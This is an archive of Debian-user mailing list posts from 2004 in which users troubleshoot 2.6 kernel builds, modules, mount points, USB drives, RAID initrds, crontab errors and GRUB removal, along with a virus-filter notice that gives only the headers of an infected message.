Maybe my last message went astray. Has anyone had any success using a 2.6.[67] kernel built themselves? I have now built a 2.6.6 and a 2.6.7 using make_kpkg. Both have apparently installed OK but panicked because they couldn't mount my root partition. Said partition is an ext3 created during a stock sarge install. The original 2.4.25 and an installed 2.6.6-1.k7 kernel have no problems. Also, I cannot create the modules for either 2.6.6 or 2.6.7, The attempt to make the modules eventally barfs telling me that there is a missing file /usr/src/kernel-source-2.6.7/include.linux/modversions.h and tells me to run make dep to creat it. But running make dep simply results in a mesage saying that make dep is no longer necessary. WRONG. Anyone any suggestions? I cannot use ndiswrapper on my notebook without recompiling the kernel and can't get the wireless connection working untiloh spit! -- |Deryk Barker, Computer Science Dept. | Music does not have to be understood| |Camosun College, Victoria, BC, Canada| It has to be listened to. | |email: [EMAIL PROTECTED] | | |phone: +1 250 370 4452 | Hermann Scherchen. | -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Xeon HT or not HT
Greg Folkert <[EMAIL PROTECTED]> writes: > On Thu, 2004-07-22 at 05:10, nx13372 wrote: >> I'm using kernel 2.4.26-1-686-smp. >> I have a dual xeon box. If in the bios i enable the HT i'll get 4 cpus, >> if not i'll get 2 cpus. >> What is bettter? [snip] > > Without hyperthreading you have 2 Things doing MANY MANY small and big > jobs. Sort of like having a 500HP motor on each your lawn mowers. Big, > clunky not AS flexible. > > With HyperThreading you 4 smaller things (each 1/2 the capacity of the > the nonHT processors) doing many many small and big jobs. Sort of like > having having a 240HP(with turbo boost to ~ 480HP if needed) motor on > each of your lawn mowers. 4 Smaller, powerful and yet more flexible to > do the job, the power is distributed based on need. > > I think the answer is clear. Is it? Does Linux 2.4 performs as good on a 4 CPU machine as it does on a 2 CPU one? Dragan -- Dragan Cvetkovic, To be or not to be is true. G. Boole No it isn't. L. E. J. Brouwer !!! Sender/From address is bogus. Use reply-to one !!! -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: modules not found after kernel recompile
On Wed, Jul 21, 2004 at 08:41:31PM +0200, Wim De Smet wrote: > On Wed, 21 Jul 2004 12:17:40 -0600, CW Harris <[EMAIL PROTECTED]> wrote: > > On Wed, Jul 21, 2004 at 07:55:27PM +0200, Wim De Smet wrote: > > > Hi, > > > > > [...] > > > > > > You normally don't need a modprobe.conf, everything should be in > > > /etc/modprobe.d. modprobe.conf is just an empty file on my system. I'm > > > > Is this true? Mine (a mostly Sarge with module-init-tools 3.0-pre2-1) has: > > > > # This line loads the part of the modprobe configuration managed with > > # update-modules(8) and built from the contents of /etc/modprobe.d/. > > include /lib/modules/modprobe.conf > > ^^ > > Which seems very important to me (not a GURU here). > > > > module-init-tools in sarge is 3.1-pre5. Maybe it has something to do > with the older version, or maybe you need this if you use udev or ^ Yes that was it. I see in the changelog that between 3.0 and 3.1 modprobe.conf is no longer used since /etc/modprobe.d/* files are parsed directly without the need for update-modules to process them. -- Chris Harris <[EMAIL PROTECTED]> --- GNU/Linux --- The best things in life are free. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: modules not found after kernel recompile
Wim De Smet([EMAIL PROTECTED]) is reported to have said: > On Wed, 21 Jul 2004 17:02:07 -0400, Wayne Topa <[EMAIL PROTECTED]> wrote: > > > > > > Wim De Smet([EMAIL PROTECTED]) is reported to have said: > > > On Wed, 21 Jul 2004 12:17:40 -0600, CW Harris <[EMAIL PROTECTED]> wrote: > > > > On Wed, Jul 21, 2004 at 07:55:27PM +0200, Wim De Smet wrote: > > > > > Hi, > > > > > > > > > [...] > > > > > > > > > > You normally don't need a modprobe.conf, everything should be in > > > > > /etc/modprobe.d. modprobe.conf is just an empty file on my system. I'm [ snipped the wrong info I sent ] I read " modprobe.conf is just an empty file " as modules.conf :-( Need new glasses, I guess. Sorry for the noise. > I don't know what you are trying to say. Yes, he needs > module-init-tools for a 2.6 kernel, that's what he is trying to > install. No he does not need a modprobe.conf (AFAIK). > > See: > $ cat modprobe.conf > $ > (eg nothing in there) > > You can safely remove the modutils if you run a 2.6.x kernel. > Wayne going to the corner and punting on the Dunce Cap. -- Real Users find the one combination of bizarre input values that shuts down the system for days. ___ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
RE: Testing + Reiserfs + quota support.
> > I've been through this the morning and as far as I can find > out reiser doesn't support quotas without patches to 2.4. No > idea on the stat of 2.6 patches Happy to patch the kernel - Does anyone have a patch location for 2.4.26 kern? Following only has up to 2.4.21.. ftp://atrey.karlin.mff.cuni.cz/pub/local/jack/quota/v2.4/ Or am I better of running an alternate Journaling FS(That includes quota support)? Regards, MB
Re: /cdrom vs. /media/cdrom
On Thu, Jul 22, 2004 at 11:29:13AM +0200, Frank Uepping wrote: > on Sarge there are many duplicating mount points for peripherals, > like: > /cdrom > /cdrom0 > /floppy > /media/cdrom > /media/cdrom0 > /media/floppy > etc. > > Why are the duplicates? > What is the preferred mount point / or /media for peripherals? > Is there any document about this issue? /media is introduced in newer versions of the FHS to have a place to put mount points without cluttering up the root directory. /media/cdrom is a link to /media/cdrom0, or could be switched to point to whatever other cdrom you typically use, like /media/cdrom1. /cdrom is a legacy link to /media/cdrom to make a few programs that hardcode /cdrom continue to work since we don't have time to track them all down and fix them for the sarge release. /cdrom0 was created by buggy versions of discover1, but this is fixed in current sarge. /floppy is not created by current installs of sarge Recent versions of the install may also set up /media/usb mount points for usb storage devices. -- see shy jo -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: USB disk drive
On Thu, Jul 22, 2004 at 05:15:42PM +0300, Micha Feigin wrote: > > Try modprobe sd-mod (scsi disk support). Yep! That solves the problem. It mounts vfat with only a Recycled directory and in that directory some odd looking files: bumby:/mnt/Recycled# ls [EMAIL PROTECTED]Åÿì{Á??8.üxd [EMAIL PROTECTED] h·??(çno.þ^e s÷ü¼'8Ö(.?¤Ý úÕ\?^Ëí?.ïà? _?xr?b9Ø.?Ò< [EMAIL PROTECTED]Åÿì{Á??8.üxd [EMAIL PROTECTED] h·??(çno.þ^e s÷ü¼'8Ö(.?¤Ý úÕ\?^Ëí?.ïà? _?xr?b9Ø.?Ò< I think it's best I don't try and write to it. -- Bill Moseley [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: mkinitrd: RAID support requires raidtools2
What do you mean you've installed raidtools2 but are using mdadm? I believe the problem could be this: o initrd-tools works on the assumption you're using devfs o if you're not using devfs, but you are using raidtools2 to manage your array, then software RAID should still work (I say this based on an initrd-tools bug report I read) o if you're not using devfs and you're using mdadm to manage your array, you're out of luck -- compile your own kernel It would be nice if Debian would take the opportunity before Sarge becomes stable to just rid itself of devfs (at least on 2.6 kernels), than software raid using using standard/modern tools would work fine with the default kernel. Of course, my recent experience hassling with this has been on Sarge, not Woody, so I could be way off. Richard --- Alec Berryman <[EMAIL PROTECTED]> wrote: > I'm trying to do software raid on a fresh install of Woody with a > 2.4.26 kernel. In order to load the software raid I need to make an > initrd image, so I installed initrd-tools. However, when I run > mkinitrd, I get the following message: > > # mkinitrd -o /boot/initrd.img-2.4.26 2.4.26 > /usr/sbin/mkinitrd: RAID support requires raidtools2 > > I've got raidtools2 installed (even though I am using mdadm). I have > the module 'md' specified in /etc/mkinitrd/modules. What can I do to > fix this error? > > ATTACHMENT part 2 application/pgp-signature name=signature.asc __ Do you Yahoo!? Vote for the stars of Yahoo!'s next ad campaign! http://advision.webevents.yahoo.com/yahoo/votelifeengine/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
/bin/sh: line 1: root: command not found
People, I keep getting these emails, from multiple servers relating to entries in /etc/crontab. AFAIK, I'm doing everything right (maybe not the best way technically, but following what the documentation says): -- using crontab -e -- looks the same to me as a working crontab on another server -- crontab package versions the same as a working crontab -- checked `man -e5 crontab` to see I had the correct format I've googled for about 3 hours, and nothing that looks like an answer, despite the fact that the problem happens often enough to deserve a FAQ. I did find where for some reason, vi stuck a 2 byte UTF-8 character in for the tab key (why? why? why?), but replacing it with a space did not help, the only difference now is that the wide character doesn't show on the subject line in my Mozilla mailbox. In fact I replaced all the tabs in /etc/crontab with space to no effect. I'm all out of clue and this has my production servers snarled up. Any ideas here? -- Christopher L. Everett Chief Technology Officer www.medbanner.com MedBanner, Inc. www.physemp.com -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Need a Traffic Shaping Crash Course Please
On Wed, 2004-07-21 at 23:50, Scarletdown wrote: > For some reason, this isn't showing up on lists.debian.user, so I will > go ahead and repost it here... > This time, however, it will need to be done on two fully operational > systems, so a failure will be more "catastrophic". Therefore, I will > need precise step by step instructions on how to do this. And if things > do still go wrong, instructions on how to recover using something like > Knoppix (which is actually how I did my Linux install in the first > place) or Mepis. General advice on making changes to "mission critical" systems: Learn a backup package (minimal install + tar, amanda, whatever). Practice restoring a couple of times, then BACKUP TWICE, make your changes and hope they go well. If not, use those newly earned restore skills to get back to a good configuration. Pat __ Switch to Netscape Internet Service. As low as $9.95 a month -- Sign up today at http://isp.netscape.com/register Netscape. Just the Net You Need. New! Netscape Toolbar for Internet Explorer Search from anywhere on the Web and block those annoying pop-ups. Download now at http://channels.netscape.com/ns/search/install.jsp -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: USB disk drive
On Wed, Jul 21, 2004 at 07:33:13PM -0700, Bill Moseley wrote: > I'm trying out a FireLite USB drive. It's been used on Windows (from > what the owner tells me and has data on it). > > I'm running kernel 2.6.6. > > When I plug it in I see this in syslog: > > Jul 21 17:18:50 bumby kernel: usb 1-2: new full speed USB device using address 2 > Jul 21 17:18:51 bumby kernel: SCSI subsystem initialized > Jul 21 17:18:51 bumby kernel: Initializing USB Mass Storage driver... > Jul 21 17:18:51 bumby kernel: scsi0 : SCSI emulation for USB Mass Storage devices > Jul 21 17:18:52 bumby scsi.agent[1675]: disk at > /devices/pci:00/:00:11.2/usb1/1-2/1-2:2.0/host0/0:0:0:0 > Jul 21 17:18:52 bumby kernel: Vendor: TOSHIBA Model: MK6021GAS Rev: GA02 > Jul 21 17:18:52 bumby kernel: Type: Direct-Access ANSI SCSI > revision: 02 > Jul 21 17:18:52 bumby usb.agent[1642]: usb-storage: loaded successfully > Jul 21 17:18:52 bumby kernel: USB Mass Storage device found at 2 > Jul 21 17:18:52 bumby kernel: usbcore: registered new driver usb-storage > Jul 21 17:18:52 bumby kernel: USB Mass Storage support registered. > > And modules seem to load correctly: > > bumby:~# lsmod > Module Size Used by > usb_storage29696 0 > scsi_mod 81152 1 usb_storage > lp 10564 0 > uhci_hcd 30672 0 > ohci1394 34756 0 > ieee1394 108340 1 ohci1394 > i2c_sensor 2944 0 > Try modprobe sd-mod (scsi disk support). > And it shows up as expected: > > bumby:~# cat /proc/scsi/usb-storage/0 >Host scsi0: usb-storage >Vendor: SmartDisk Corp. > Product: FireLite (USB 2.0) > Serial Number: 00010f6f > Protocol: Transparent SCSI > Transport: Bulk >Quirks: > > bumby:~# cat /proc/bus/usb/devices | grep FireLite > S: Product=FireLite (USB 2.0) > > And I've got my device files: > > bumby:~# ls -l /dev/scd0 /dev/scd1 > brw-rw1 root cdrom 11, 0 2002-03-14 13:54 /dev/scd0 > brw-rw1 root cdrom 11, 1 2002-03-14 13:54 /dev/scd1 > > How do I tell what /dev/scd* the device connects to? > I tried installing the sg3-utils: > > bumby:~# sg_scan -i > bumby:~# > > And I can't mount: > > bumby:~# mount -t vfat /dev/sda1 /mnt > mount: /dev/sda1 is not a valid block device > > I tried both of my USB ports. > > > At this point I'm swinging in the dark. > Any ideas? > > > > > > -- > Bill Moseley > [EMAIL PROTECTED] > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > > > +++ > This Mail Was Scanned By Mail-seCure System > at the Tel-Aviv University CC. > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: How to de-Grub?
On Thu, Jul 22, 2004 at 12:47:14AM +, Stephen Cradock wrote: > Well, it's a long story!!! > > I started trying to install Woody (see "Starting up.." thread a couple of > weeks ago) - found Woody wouldn't recognize my Intel 845 video chipset. > Switched to "vesa" but that would only give me 640x480 display. > > So I decided to upgrade to Sarge - set up another Linux partition, booted > up Sarge - it wouldn't detect my network (ethernet) connection. Several > tries to fix that - no joy. But after failing to establish a network > connection, I went on with the install, and Sarge installed Grub. That was > fine - Grub detected my primary OS (Windows XP), and I set that to be the > default boot option. > > Then, as one does when playing with Linux, I went stark staring bonkers, > and decide to try Gentoo - a friend told me it was much easier to install. > Rather than make yet another partition, I wiped the Sarge partition and > installed Gentoo there, from a CD. That went OK, but also failed to detect > my ethernet card. So it's back to Windows to go online to find out what to > do next - URGGGH - Grub failed, of course - I had wiped out menu.lst when I > deleted Sarge. So I couldn't get into Windows, or online with Gentoo. > > Now I want to remove Grub - it has gone and installed itself in my MBR, and > I don't know how to get it out. Any help? > > Stephen Cradock > IIRC you need a dos disk (maybe the window install disk will work if you use the command line option, or manual repair or something like that) Then try running fdisk /mbr to overwrite the mbr. Now check the fdisk options, there should be an option to set the active boot partition, set it to the windows one. Hopefully that will do the trick. For you network card. Try doing from inside linux (assuming it installed far enough) lspci -vv and look for you network card. During the installation (at least for the advanced one) you should get an option to chose extra drivers manually, see if you find the matching driver this way, or post the information and maybe we can help you more. > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact > [EMAIL PROTECTED] > > > +++ > This Mail Was Scanned By Mail-seCure System > at the Tel-Aviv University CC. > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
RE: Debian installer beta 4 can't mount ext3 partitions
Jason Rennie wrote: > Hello, > > I just did a Debian Sarge install using the beta 4 installer. I had > an existing ext3 paritition that I wanted to mount as /home, but after > "manually partitioning" and telling Debian to use the existing format, > Debian complained that the ext2 filesystem had something wrong with > it. I don't have any ext2 filesystems. I presume it was looking at > the ext3 filesystem, trying to mount it as an ext2 filesystem. When I > told Debian to ignore the partition, it installed fine. > > Anyone else seen this problem? Has it been fixed in one of the daily > installer builds? > > Jason I had that problem, what I did was configure all partitions, not mount /home at all, let the pc build and once it was finished edited /etc/fstab and add in the home partition, the problem is fixed in the latest installer AFAIK -- DISCLAIMER: The information contained in this email and in any attachments is confidential and is designated solely for the attention and use of the intended recipient(s). If you are not the intended recipient(s) of this email you must not use, disclose, copy, distribute or retain this message, the attachment(s) or any part thereof. If you believe that you have received this email in error please notify us immediately at the address set out below. Please also delete all copies of this email and any attachment(s) from your computer system. Unless expressly stated this email is not intended to create any contractual relationship. If this email is not sent in the course of the senders employment or fulfilment of his/her duties to Aer Rianta, Aer Rianta accepts no liability whatsoever for the content of this message or any attachment(s). [EMAIL PROTECTED] Aer Rianta, Head Office, Dublin Airport -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Filter scan result notification from enocmrh1
This is a filter detection notice generated by Sendmail Attachment Filter v2.5.0 at enocmrh1. The original message was being transferred from async217.kaynet.net.tr (212.174.242.17), and was ultimately accepted. The scanned parts of this message contained 1 infection(s), 0 of which were successfully repaired. Details are provided in the following parts of this message. The second part contains information about the scan that was performed and the result. The third part of this notice contains the original headers from the infected message. Please contact [EMAIL PROTECTED] for further information. binIeuzto5Zav.bin Description: message/scan-result From: [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: Re: Your picture Date: Thu, 22 Jul 2004 16:51:33 +0300 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="=_NextPart_000_0010_61E9.27A1" X-Priority: 3 X-MSMail-Priority: Normal
Re: /cdrom vs. /media/cdrom
Hello Frank Uepping (<[EMAIL PROTECTED]>) wrote: > on Sarge there are many duplicating mount points for peripherals, > like: > /cdrom > /cdrom0 > /floppy > /media/cdrom > /media/cdrom0 > /media/floppy > etc. > > Why are the duplicates? On my system only /cdrom was created. > What is the preferred mount point / or /media for peripherals? > Is there any document about this issue? If I remember correctly, the file system hierarchy standard says mount points for removable media should be in /media, so I guess this is the preferred way. Of course, you can change this to whatever you like on your own system. If you remove the stuff in /, you probably also have to reconfigure apt if you installed from CD or DVD, e.g. by adding Acquire::cdrom::mount "/media/cdrom"; to /etc/apt/apt.conf. best regards Andreas Janssen -- Andreas Janssen <[EMAIL PROTECTED]> PGP-Key-ID: 0xDC801674 ICQ #17079270 Registered Linux User #267976 http://www.andreas-janssen.de/debian-tipps.html -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: /cdrom vs. /media/cdrom
Em Thu, 22 Jul 2004 11:50:08 +0200, Frank Uepping escreveu: > on Sarge there are many duplicating mount points for peripherals, > like: > /cdrom > /cdrom0 > /floppy > /media/cdrom > /media/cdrom0 > /media/floppy > etc. > > Why are the duplicates? Actually they are not duplicatesâ For some reason things are mounted on (/media)/cdrom0, and (/media)/cdrom is a symlink to it. I suppose the idea is that one can have (/media)/cdrom[0-9] and choose a default by changing the symlink, but I never had more than a CD drive to check it. > What is the preferred mount point / or /media for peripherals? Depends on whom prefers what for whichever reasonâ Seriously, / was never a standard, but it was Debianâs practice, and and still is at least in stable. /media is the LSB standard, and should be configured in all new systems starting from current sarge. The detail is that there are lots of programs still looking for, and even creating, aberrations like /cdrom. One notorious culprit I still have to force into compliance by /etc editing is discover(2). > Is there any document about this issue? Yes, the latest LSB. -- Leandro GuimarÃes Faria Corsetti Dutra +55 (44) 3028 7467 ext34 Rua Guarani 361 ap 601 â Z4+55 (44) 3025 6253 87.014-040 MaringÃ, PR [EMAIL PROTECTED] BRAZIL http://br.geocities.com./lgcdutra/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: enable duplex
When I enable both eth0 and eth1 the network only works after boot when I do /etc/init.d/networking restart /etc/network/interfaces: auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 81.7.167.226 netmask 255.255.255.240 gateway 81.7.167.225 auto eth1 iface eth1 inet static address 81.7.167.227 netmask 255.255.255.240 gateway 81.7.167.225 Also when I set up bonding I can not use the network. This is what I did: modprobe bonding miimon=250 mode=1 ifconfig bond0 81.7.167.228 netmask 255.255.255.240 ifenslave bond0 eth0 eth1 Any clues? Jacob -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Wacom Tablet Setup
Greetings All, I had my Wacom Graphire tablet working reasonably well in kernel 2.4 but haven't yet attempted to set it up in the 2.6 kernel. Has anyone had any success doing that? All the resources I've gathered from Google and the web are for the 2.4 kernel. The man pages on Wacom are useless to me because I do not know how to interpret them for the Graphire, the smallest of the tablets, thankfully I do know how to restore the XF86Conf-4 file if I do hose it so I can store XServer. I'm feeling masochistic enough to try but some encouragement and hopefully a pointer or two would leave me ecstatically grateful. Thanks ahead of time for any help! Gail -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Xeon HT or not HT
On Thu, Jul 22, 2004 at 10:10:28AM +0100, nx13372 wrote: | Hi all, | | I'm using kernel 2.4.26-1-686-smp. | I have a dual xeon box. If in the bios i enable the HT i'll get 4 cpus, | if not i'll get 2 cpus. You have 2 Physical CPUs regardless. With HT each physical CPU is divided into 2 Logical CPUs. I've heard HT called "poor-man's SMP". | What is bettter? I would imagine HT is generally better than no-HT. To be certain you would have to benchmark both settings in your environment. My workstation at work is a hyperthreaded uniprocessor P4. With an -smp kernel I see two logical CPUs. It runs nice and fast (it also happens to be 3GHz). I have no other experience with multiple processor systems. -D -- A mouse is a device used to point at the xterm you want to type in. --Kim Alm, a.s.r www: http://dman13.dyndns.org/~dman/jabber: [EMAIL PROTECTED] signature.asc Description: Digital signature
Re: Webmin dies on startup
--- Jonathan Melhuish <[EMAIL PROTECTED]> wrote: > I usually run the stable version, but I have also tried installing the > testing > version, to no avail. I have tried removing and re-installing both > versions. paste the output of: bash -x /etc/init.d/webmin start -- Thomas Adam = "The Linux Weekend Mechanic" -- http://linuxgazette.net "TAG Editor" -- http://linuxgazette.net " We'll just save up your sins, Thomas, and punish you for all of them at once when you get better. The experience will probably kill you. :)" -- Benjamin A. Okopnik (Linux Gazette Technical Editor) ___ALL-NEW Yahoo! Messenger - so many all-new ways to express yourself http://uk.messenger.yahoo.com -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: printing to remote ip through firewall
On Thu, Jul 22, 2004 at 11:30:39AM -0400, Antonio Rodriguez wrote: | Some times it is necessary to print a document in a printer | behind a firewall. The internal ip of the printer and the outer ip of | the firewall are known. How can this be done? If you run the firewall, you can use NAT (sometimes called PAT or port-forwarding) to connect the desired port on the outside address of the firewall to the printer on the other side. (eg port 631 if the printer and client support IPP) If you have control of a machine inside the firewall, you can start an ssh session on that machine and use remote port forwarding. To create the tunnel 'ssh -R1631:printer:631 other-machine'. On the remote machine create a prtiner queue that uses 'ipp://localhost:1631/queue-name' as the device. Substitute queue-name for the name and path to the queue on the print spooler (this depends on the spooler used -- cups as a server and HP's JetDirect devices are different). (The specifics I give assume the remote machine uses CUPS) If you are outside the firewall and have no control over it or a way to connect to (and control) a machine inside the firewall then you cannot connect. (or you have to ask the network admin to adjust the firewall to allow your connection) -D -- Commit to the Lord whatever you do, and your plans will succeed. Proverbs 16:3 www: http://dman13.dyndns.org/~dman/jabber: [EMAIL PROTECTED] signature.asc Description: Digital signature
Re: KVM (kernel memory interface)
On Thu, 22 Jul 2004 13:53:18 -0700, Mark Ferlatte <[EMAIL PROTECTED]> wrote: > stan said on Thu, Jul 22, 2004 at 04:45:12PM -0400: > > On Wed, Jul 21, 2004 at 05:43:36PM -0400, Stewart Flood wrote: > > > Is there a package that I need to install? If not, what do I use to get the > > > functionality of KVM? > > > > > The kvm interface in the BSD's is used to collect things like process > > information etc. > > > > How is that done in Linux? > > You read values out of the /proc filesystem. > > I don't believe there is a KVM interface to the Linux /proc information, > though; you'll need to provide your own layer. Writing a layer to emulate KVM is probably easier than re-writing your app to read from /proc. If you do this, please also release it under a DFSG compatible licence so other people may benefit :-) -- Jon Dowland [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Debian-Fluxbox Q
On Thu, 22 Jul 2004 15:17:11 -0400, Tony Uceda Velez <[EMAIL PROTECTED]> wrote: > Changing my default desktop manager in Debian has proven a little more > cumbersome than I thought. I edited my > /etc/X11/default-display-manager file to the absolute path of where the > fluxbox binary file is. fluxbox is a window manager, not a display manager. A window manager manages windows. A display manager provides a means of logging into the computer graphically and automatically starting X. To change the default display manager use dpkg-reconfigure rather than editing files which can go wrong when packages are updated/removed/added. To change window manager, put the binary name in the file ~/.xsession and choose the option 'Default' in your display manager. This is provided by (At least) wdm and xdm; I imagine gdm and kdm also provide a 'default' entry. Otherwise there may also be a default-window-manager symlink managed by update-alternatives; how that is honoured I don't know. -- Jon Dowland [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Webmin dies on startup
Since upgrading my system on 10th July, webmin hasn't worked. When I try running "/etc/init.d/webmin start", it says "Starting webmin: webmin" and returns control to the command line - but no processes persist and no ports stay open. What's more, I don't even get any log output in /var/log/webmin/webmin.log or /var/log/messages. I usually run the stable version, but I have also tried installing the testing version, to no avail. I have tried removing and re-installing both versions. Has anybody got any ideas? TIA, Jon -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
mkinitrd: RAID support requires raidtools2
I'm trying to do software raid on a fresh install of Woody with a 2.4.26 kernel. In order to load the software raid I need to make an initrd image, so I installed initrd-tools. However, when I run mkinitrd, I get the following message: # mkinitrd -o /boot/initrd.img-2.4.26 2.4.26 /usr/sbin/mkinitrd: RAID support requires raidtools2 I've got raidtools2 installed (even though I am using mdadm). I have the module 'md' specified in /etc/mkinitrd/modules. What can I do to fix this error? signature.asc Description: Digital signature
Re: modules not found after kernel recompile
Hi, You can use either modprobe.conf or the modprobe.d directory-or both, both of which are replacements for the old modules.conf. When migrating to the newer module-init-tools, you should move required entries from modules.conf to the newer modprobe.conf or modprobe.d directory. I've picked this thread somewehere in the middle I rekon, but taking a guess from the subject line I suggest the following -- 1. Is there a /lib/modules/uname -r directory? Does it have the modules you compiled in it? If not, maybe the make modules_install wasn't done? 2. Is there a modules.dep file in /lib/modules/uname -r directory? If not, depmod possibly failed, try a depmod -a and then a modprobe again. HTH Awais - Original Message - From: "Wim De Smet" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Thursday, July 22, 2004 5:17 PM Subject: Re: modules not found after kernel recompile > On Wed, 21 Jul 2004 17:02:07 -0400, Wayne Topa <[EMAIL PROTECTED]> wrote: > > > > > > Wim De Smet([EMAIL PROTECTED]) is reported to have said: > > > On Wed, 21 Jul 2004 12:17:40 -0600, CW Harris <[EMAIL PROTECTED]> wrote: > > > > On Wed, Jul 21, 2004 at 07:55:27PM +0200, Wim De Smet wrote: > > > > > Hi, > > > > > > > > > [...] > > > > > > > > > > You normally don't need a modprobe.conf, everything should be in > > > > > /etc/modprobe.d. modprobe.conf is just an empty file on my system. I'm > > > > > > > > Is this true? Mine (a mostly Sarge with module-init-tools 3.0-pre2-1) has: > > > > > > > > # This line loads the part of the modprobe configuration managed with > > > > # update-modules(8) and built from the contents of /etc/modprobe.d/. > > > > include /lib/modules/modprobe.conf > > > > ^^ > > > > Which seems very important to me (not a GURU here). > > > > > > > > > > module-init-tools in sarge is 3.1-pre5. Maybe it has something to do > > > with the older version, or maybe you need this if you use udev or > > > something else. I haven't really looked around for info on the subject > > > but in any case I don't need it and that means with a somewhat typical > > > setup it shouldn't be required (I never pull any fancy stuff and I > > > have hardly ever messed with my modules config) > > > > > > cheers, > > > Wim > > > > > > P.S.: I think we're all waiting here for somebody with a bit more > > > knowledge to explain it to us after which we can say "h, like > > > that" :-) > > > > aptitude show module-init-tools > > Description: tools for managing Linux kernel modules > > This package contains a set of programs for loading, inserting, and > > removing kernel modules for Linux (versions 2.5.48 and above). It > > serves the same function that the "modutils" package serves for Linux 2.4. > > > > NOTE: I am running testing with a bit of unstable with a 2.6.7 > > kernel. > > > > dpkg -l ii module-init-tools 3.1-pre5-1 tools for managing Linux kernel modules > > > > less /etc/modules.conf > > ### This file is automatically generated by update-modules" > > # > > # Please do not edit this file directly. If you want to change or add > > # anything please take a look at the files in /etc/modutils and read > > # the manpage for update-modules. > > [ snip] > > ### > > # Generic section: do not change or copy > > # > > # All HDDs > > probeall /dev/discsscsi_hostadapter sd_mod ide-probe-mod ide-disk ide-floppy DAC960 > > alias /dev/discs/* /dev/discs > > > > # All CD-ROMs > > probeall /dev/cdroms scsi_hostadapter sr_mod ide-probe-mod ide-cd cdrom > > alias /dev/cdroms/* /dev/cdroms > > alias /dev/cdrom/dev/cdroms > > > > # All tapes > > probeall /dev/tapesscsi_hostadapter st ide-probe-mod ide-tape > > alias /dev/tapes/* /dev/tapes > > > > {snip many pages } > > > > If you are trying to use the 2.6.s kernels you 'do' need to load module-init-tools. > > > > :-) HTH, YMMV, HAND :-) > > I don't know what you are trying to say. Yes, he needs > module-init-tools for a 2.6 kernel, that's what he is trying to > install. No he does not need a modprobe.conf (AFAIK). > > See: > $ cat modprobe.conf > $ > (eg nothing in there) > > You can safely remove the modutils if you run a 2.6.x kernel. > > In any case I have some more ideas (to the OP): > - modprobe checks for your modules in /lib/modules/`uname -r`. So > check uname -r to see if it does indeed correspond to the directory > name, as something might have gone wrong when setting an extraversion > or whatever. > - check in that directory to see that there is a modules.dep file, > maybe something went wrong in this stage. > > greets, > Wim > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subjec
Re: your mail
